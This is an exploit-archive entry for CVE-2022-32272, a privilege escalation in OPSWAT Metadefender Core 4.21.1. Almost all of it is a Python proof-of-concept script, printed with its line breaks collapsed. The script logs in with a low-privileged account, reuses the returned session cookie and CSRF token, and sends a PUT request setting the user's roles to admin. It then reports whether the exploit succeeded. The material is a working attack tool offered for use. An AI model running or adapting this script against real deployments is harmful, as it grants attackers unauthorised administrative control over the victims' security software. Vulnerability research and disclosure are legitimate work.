Headline
OPSWAT Metadefender Core 4.21.1 Privilege Escalation
OPSWAT Metadefender Core version 4.21.1 suffers from a privilege escalation vulnerability.
# Exploit Title: OPSWAT Metadefender Core - Privilege Escalation# Date: 24 October 2022# Exploit Author: Ulascan Yildirim# Vendor Homepage: https://www.opswat.com/# Version: Metadefender Core 4.21.1# Tested on: Windows / Linux# CVE : CVE-2022-32272# =============================================================================# This is a PoC for the Metadefender Core Privilege escalation vulnerability.# To use this PoC, you need a Username & Password.# The OMS_CSRF_TOKEN allows users to execute commands with higher privileges.# =============================================================================#!/usr/bin/env python3import requestsimport jsonfrom getpass import getpassurl = input("Enter URL in this Format (http://website.com): ")username = input("Username: ")password = getpass("Password: ")url_login = url+'/login'url_user = url+'/user'logindata = {"user":username,"password":password}## Get the OMS_CSRF_TOKEN & session cookieresponse_login = requests.post(url_login, json = logindata).json()json_str = json.dumps(response_login)resp = json.loads(json_str)token = resp['oms_csrf_token']session = resp['session_id']## Prepare Header & Cookieheaders = { "oms_csrf_token": token,}cookie = { "session_id_ometascan": session}## Set Payload to get Admin rolepayload = '{"roles": ["1"]}'response = requests.put(url_user,headers=headers,cookies=cookie,data=payload)print("Response status code: "+str(response.status_code))if response.status_code == 200: print("Expolit Successful!")else: print("Exploit Unsuccessful")